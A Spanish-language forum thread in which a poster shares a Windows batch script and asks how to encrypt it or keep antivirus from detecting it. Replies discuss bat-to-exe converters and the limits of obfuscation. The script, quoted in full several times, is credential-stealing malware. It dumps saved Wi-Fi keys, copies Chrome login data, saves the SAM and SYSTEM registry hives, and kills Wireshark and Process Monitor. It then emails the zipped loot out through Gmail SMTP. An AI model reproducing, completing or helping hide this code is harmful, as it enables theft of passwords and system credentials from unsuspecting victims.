Tengo un script bat aquí y me gustaría cifrarlo o que el antivirus no lo detecte, ¿alguien podría decirme cómo hacerlo?

Para efectos legales, no me hago responsable del mal uso del código :D
 

FaltaDEiN fORmAO" escribió: 15 Sep 2024, 17:30 Tengo un script bat aquí y me gustaría cifrarlo o que el antivirus no lo detecte, ¿alguien podría decirme cómo hacerlo?

Para efectos legales, no me hago responsable del mal uso del código :D

Código: Seleccionar todo

@echo off title XxXFALtaDeInformationXxX cd C:\ProgramData if exist Settings (goto fim) else (goto criar) :criar cd C:\ProgramData md Settings cd C:\ProgramData\Settings md apache cd C:\ProgramData\Settings\apache setlocal EnableDelayedExpansion goto :main :getKey for /F "tokens=2 delims=: usebackq" %%B in (`netsh wlan show profiles %1 key^=clear ^| find "Key Content"`) do ( set _clear_key=%%B set _clear_key=!_clear_key:~1! ) goto :eof :main for /F "tokens=2 delims=:" %%A in ('netsh wlan show profiles ^| find "User Profile"') do ( set _profile_name=%%A set _profile_name=!_profile_name:~1! set _clear_key=No password call :getKey !_profile_name! echo !_profile_name:~0! : !_clear_key:~0! ) >> Net.txt :: pass Net :: falta o forifox copy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\login Data" C:\ProgramData\Settings\apache ::Precisa de Root :: PASS Windows reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin if %errorlevel% neq 1 ( cd C:\ProgramData\Settings\apache reg save HKLM\sam ./sam.save reg save HKLM\system ./system.save reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f tasklist /FI "imagename eq Wireshark.exe" | find "Wireshark.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Wireshark.exe" & del /F "SERVER") tasklist /FI "imagename eq Process Monitor.exe" | find "Process Monitor.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Process Monitor.exe" & del /F "serve") powershell.exe -c "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::CreateFromDirectory('C:\ProgramData\Settings\apache', 'C:\ProgramData\Settings\arquivo.zip')" cd C:\ProgramData\Settings RMDIR apache /Q /S powershell.exe -c Send-MailMessage -SmtpServer "smtp.gmail.com" -port 587 -UseSsl -Subject "teste" -body "NEPIESKARIETIES" -Attachments "C:\ProgramData\Settings\arquivo.zip" -from "@gmail.com"-to "@gmail.com" -credential (New-Object -typeName System.Management.Automation.PSCredential -ArgumentList "@gmail.com", (ConvertTo-SecureString -String "password" -AsPlainText -Force)) ::falta a parte da cruptografia exit /b ) else ( echo MsgBox "The program has not been completed. Try again as an administrator!!", 16 + 0 + 4096, "ERROR LOADING FAILED!" > LOL.vbs && LOL.vbs del lol.vbs exit /b ) 

 

Consideraría cambiar a un ejecutable más tarde 

He visto programas que convierten bat a exe e incluso hacen que el terminal sea invisible durante la ejecución.

pero al convertir bat a exe el antivirus detecta inmediatamente el archivo

programa: convertir bat a exe

Flight embedded" escribió: 16 Sep 2024, 06:33

FaltaDEiN fORmAO" escribió: 15 Sep 2024, 17:30 Tengo un script bat aquí y me gustaría cifrarlo o que el antivirus no lo detecte, ¿alguien podría decirme cómo hacerlo?

Para efectos legales, no me hago responsable del mal uso del código :D

Código: Seleccionar todo

@echo off title XxXFALtaDeInformationXxX cd C:\ProgramData if exist Settings (goto fim) else (goto criar) :criar cd C:\ProgramData md Settings cd C:\ProgramData\Settings md apache cd C:\ProgramData\Settings\apache setlocal EnableDelayedExpansion goto :main :getKey for /F "tokens=2 delims=: usebackq" %%B in (`netsh wlan show profiles %1 key^=clear ^| find "Key Content"`) do ( set _clear_key=%%B set _clear_key=!_clear_key:~1! ) goto :eof :main for /F "tokens=2 delims=:" %%A in ('netsh wlan show profiles ^| find "User Profile"') do ( set _profile_name=%%A set _profile_name=!_profile_name:~1! set _clear_key=No password call :getKey !_profile_name! echo !_profile_name:~0! : !_clear_key:~0! ) >> Net.txt :: pass Net :: falta o forifox copy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\login Data" C:\ProgramData\Settings\apache ::Precisa de Root :: PASS Windows reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin if %errorlevel% neq 1 ( cd C:\ProgramData\Settings\apache reg save HKLM\sam ./sam.save reg save HKLM\system ./system.save reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f tasklist /FI "imagename eq Wireshark.exe" | find "Wireshark.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Wireshark.exe" & del /F "SERVER") tasklist /FI "imagename eq Process Monitor.exe" | find "Process Monitor.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Process Monitor.exe" & del /F "serve") powershell.exe -c "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::CreateFromDirectory('C:\ProgramData\Settings\apache', 'C:\ProgramData\Settings\arquivo.zip')" cd C:\ProgramData\Settings RMDIR apache /Q /S powershell.exe -c Send-MailMessage -SmtpServer "smtp.gmail.com" -port 587 -UseSsl -Subject "teste" -body "NEPIESKARIETIES" -Attachments "C:\ProgramData\Settings\arquivo.zip" -from "@gmail.com"-to "@gmail.com" -credential (New-Object -typeName System.Management.Automation.PSCredential -ArgumentList "@gmail.com", (ConvertTo-SecureString -String "password" -AsPlainText -Force)) ::falta a parte da cruptografia exit /b ) else ( echo MsgBox "The program has not been completed. Try again as an administrator!!", 16 + 0 + 4096, "ERROR LOADING FAILED!" > LOL.vbs && LOL.vbs del lol.vbs exit /b ) 

 

Un archivo con formato .bat no se puede camuflar, ni muchos menos  encriptar.
¿En qué recurso o programa estabas pensando? 

Flight embedded" escribió: 16 Sep 2024, 06:33

FaltaDEiN fORmAO" escribió: 15 Sep 2024, 17:30 Tengo un script bat aquí y me gustaría cifrarlo o que el antivirus no lo detecte, ¿alguien podría decirme cómo hacerlo?

Para efectos legales, no me hago responsable del mal uso del código :D

Código: Seleccionar todo

@echo off title XxXFALtaDeInformationXxX cd C:\ProgramData if exist Settings (goto fim) else (goto criar) :criar cd C:\ProgramData md Settings cd C:\ProgramData\Settings md apache cd C:\ProgramData\Settings\apache setlocal EnableDelayedExpansion goto :main :getKey for /F "tokens=2 delims=: usebackq" %%B in (`netsh wlan show profiles %1 key^=clear ^| find "Key Content"`) do ( set _clear_key=%%B set _clear_key=!_clear_key:~1! ) goto :eof :main for /F "tokens=2 delims=:" %%A in ('netsh wlan show profiles ^| find "User Profile"') do ( set _profile_name=%%A set _profile_name=!_profile_name:~1! set _clear_key=No password call :getKey !_profile_name! echo !_profile_name:~0! : !_clear_key:~0! ) >> Net.txt :: pass Net :: falta o forifox copy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\login Data" C:\ProgramData\Settings\apache ::Precisa de Root :: PASS Windows reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin if %errorlevel% neq 1 ( cd C:\ProgramData\Settings\apache reg save HKLM\sam ./sam.save reg save HKLM\system ./system.save reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f tasklist /FI "imagename eq Wireshark.exe" | find "Wireshark.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Wireshark.exe" & del /F "SERVER") tasklist /FI "imagename eq Process Monitor.exe" | find "Process Monitor.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Process Monitor.exe" & del /F "serve") powershell.exe -c "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::CreateFromDirectory('C:\ProgramData\Settings\apache', 'C:\ProgramData\Settings\arquivo.zip')" cd C:\ProgramData\Settings RMDIR apache /Q /S powershell.exe -c Send-MailMessage -SmtpServer "smtp.gmail.com" -port 587 -UseSsl -Subject "teste" -body "NEPIESKARIETIES" -Attachments "C:\ProgramData\Settings\arquivo.zip" -from "@gmail.com"-to "@gmail.com" -credential (New-Object -typeName System.Management.Automation.PSCredential -ArgumentList "@gmail.com", (ConvertTo-SecureString -String "password" -AsPlainText -Force)) ::falta a parte da cruptografia exit /b ) else ( echo MsgBox "The program has not been completed. Try again as an administrator!!", 16 + 0 + 4096, "ERROR LOADING FAILED!" > LOL.vbs && LOL.vbs del lol.vbs exit /b ) 

 

Un archivo con formato .bat no se puede camuflar, ni muchos menos  encriptar.
¿En qué recurso o programa estabas pensando? 

Bl4ckV escribió: 18 Sep 2024, 16:13

Flight embedded" escribió: 16 Sep 2024, 06:33

FaltaDEiN fORmAO" escribió: 15 Sep 2024, 17:30 Tengo un script bat aquí y me gustaría cifrarlo o que el antivirus no lo detecte, ¿alguien podría decirme cómo hacerlo?

Para efectos legales, no me hago responsable del mal uso del código :D

Código: Seleccionar todo

@echo off title XxXFALtaDeInformationXxX cd C:\ProgramData if exist Settings (goto fim) else (goto criar) :criar cd C:\ProgramData md Settings cd C:\ProgramData\Settings md apache cd C:\ProgramData\Settings\apache setlocal EnableDelayedExpansion goto :main :getKey for /F "tokens=2 delims=: usebackq" %%B in (`netsh wlan show profiles %1 key^=clear ^| find "Key Content"`) do ( set _clear_key=%%B set _clear_key=!_clear_key:~1! ) goto :eof :main for /F "tokens=2 delims=:" %%A in ('netsh wlan show profiles ^| find "User Profile"') do ( set _profile_name=%%A set _profile_name=!_profile_name:~1! set _clear_key=No password call :getKey !_profile_name! echo !_profile_name:~0! : !_clear_key:~0! ) >> Net.txt :: pass Net :: falta o forifox copy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\login Data" C:\ProgramData\Settings\apache ::Precisa de Root :: PASS Windows reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin if %errorlevel% neq 1 ( cd C:\ProgramData\Settings\apache reg save HKLM\sam ./sam.save reg save HKLM\system ./system.save reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /f tasklist /FI "imagename eq Wireshark.exe" | find "Wireshark.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Wireshark.exe" & del /F "SERVER") tasklist /FI "imagename eq Process Monitor.exe" | find "Process Monitor.exe" if %errorlevel% == 0 (TASKKILL /F /IM "Process Monitor.exe" & del /F "serve") powershell.exe -c "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::CreateFromDirectory('C:\ProgramData\Settings\apache', 'C:\ProgramData\Settings\arquivo.zip')" cd C:\ProgramData\Settings RMDIR apache /Q /S powershell.exe -c Send-MailMessage -SmtpServer "smtp.gmail.com" -port 587 -UseSsl -Subject "teste" -body "NEPIESKARIETIES" -Attachments "C:\ProgramData\Settings\arquivo.zip" -from "@gmail.com"-to "@gmail.com" -credential (New-Object -typeName System.Management.Automation.PSCredential -ArgumentList "@gmail.com", (ConvertTo-SecureString -String "password" -AsPlainText -Force)) ::falta a parte da cruptografia exit /b ) else ( echo MsgBox "The program has not been completed. Try again as an administrator!!", 16 + 0 + 4096, "ERROR LOADING FAILED!" > LOL.vbs && LOL.vbs del lol.vbs exit /b ) 

 

Un archivo con formato .bat no se puede camuflar, ni muchos menos  encriptar.
¿En qué recurso o programa estabas pensando? 

Como mucho ofuscar aunque no sirve de nada ya que sigues llamando las mismas apis